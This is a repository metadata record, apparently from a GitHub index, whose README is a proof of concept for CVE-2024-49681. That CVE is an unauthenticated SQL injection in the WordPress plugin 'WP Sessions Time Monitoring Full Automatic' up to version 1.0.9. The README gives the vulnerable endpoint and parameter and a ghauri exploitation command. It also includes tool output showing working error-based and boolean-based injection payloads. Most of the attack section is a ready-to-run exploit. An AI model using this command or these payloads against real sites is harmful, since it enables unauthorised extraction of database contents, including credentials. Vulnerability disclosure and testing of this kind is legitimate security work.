{"id":21125675,"url":"https://github.com/randomrobbiebf/cve-2024-49681","last_synced_at":"2025-08-15T22:38:06.736Z","repository":{"id":261968517,"uuid":"885857761","full_name":"RandomRobbieBF/CVE-2024-49681","owner":"RandomRobbieBF","description":"WP Sessions Time Monitoring Full Automatic \u003c= 1.0.9 - Unauthenticated SQL Injection","archived":false,"fork":false,"pushed_at":"2024-11-09T15:25:29.000Z","size":2,"stargazers_count":3,"open_issues_count":0,"forks_count":1,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-03-14T11:41:36.197Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-11-09T15:24:16.000Z","updated_at":"2024-11-14T10:40:35.000Z","dependencies_parsed_at":"2024-11-09T16:39:17.038Z","dependency_job_id":null,"html_url":"https://github.com/RandomRobbieBF/CVE-2024-49681","commit_stats":null,"previous_names":["randomrobbiebf/cve-2024-49681"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2024-49681","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-49681","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-49681/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-49681/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-49681/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2024-49681/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-49681/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":270639079,"owners_count":24620656,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-15T02:00:12.559Z","response_time":110,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:19.949Z","updated_at":"2025-08-15T22:38:06.691Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2024-49681\nWP Sessions Time Monitoring Full Automatic \u0026lt;= 1.0.9 - Unauthenticated SQL Injection\n\n# Description:\nThe WP Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n\n```\nPublished: 2024-10-21 00:00:00\nCVE: CVE-2024-49681\nCVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\nCVSS Score: 7.5\nSlugs: activitytime\n```\n\nPOC\n---\n\n```\nghauri -u http://kubernetes.docker.internal/wp-admin/admin-ajax.php --data=\"action=activitytime_action\u0026uri=test\" -p uri --dbms mysql --dbs\n\n\n  ________.__                        .__  {1.3.8}\n /  _____/|  |__ _____   __ _________|__|\n/   \\  ___|  |  \\\\__  \\ |  |  \\_  __ \\  |\n\\    \\_\\  \\   Y  \\/ __ \\|  |  /|  | \\/  |\n \\______  /___|  (____  /____/ |__|  |__|\n        \\/     \\/     \\/         https://github.com/r0oth3x49\n                                 An advanced SQL injection detection \u0026 exploitation tool.\n  \n\n\n[*] starting @ 15:23:38 /2024-11-09/\n\n[15:23:38] [INFO] testing connection to the target URL\nGhauri resumed the following injection point(s) from stored session:\n---\nParameter: dbid (POST)\n    Type: time-based blind\n    Title: MySQL \u003e= 5.0.12 time-based blind (query SLEEP)\n    Payload: action=activitytime_action\u0026uri=test\n\nParameter: uri (POST)\n    Type: error-based\n    Title: MySQL \u003e= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)\n    Payload: action=activitytime_action\u0026uri=test' AND UPDATEXML(0,CONCAT_WS('(', '~','r0oth3x49','~'),0)-- wXyW\n\n    Type: boolean-based blind\n    Title: AND boolean-based blind - WHERE or HAVING clause\n    Payload: action=activitytime_action\u0026uri=test' AND 08875=8875-- wXyW\n---\nthere were multiple injection points, please select the one to use for following injections:\n[0] place: POST, parameter: dbid  (default)\n[1] place: POST, parameter: uri\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-49681","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2024-49681","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-49681/lists"}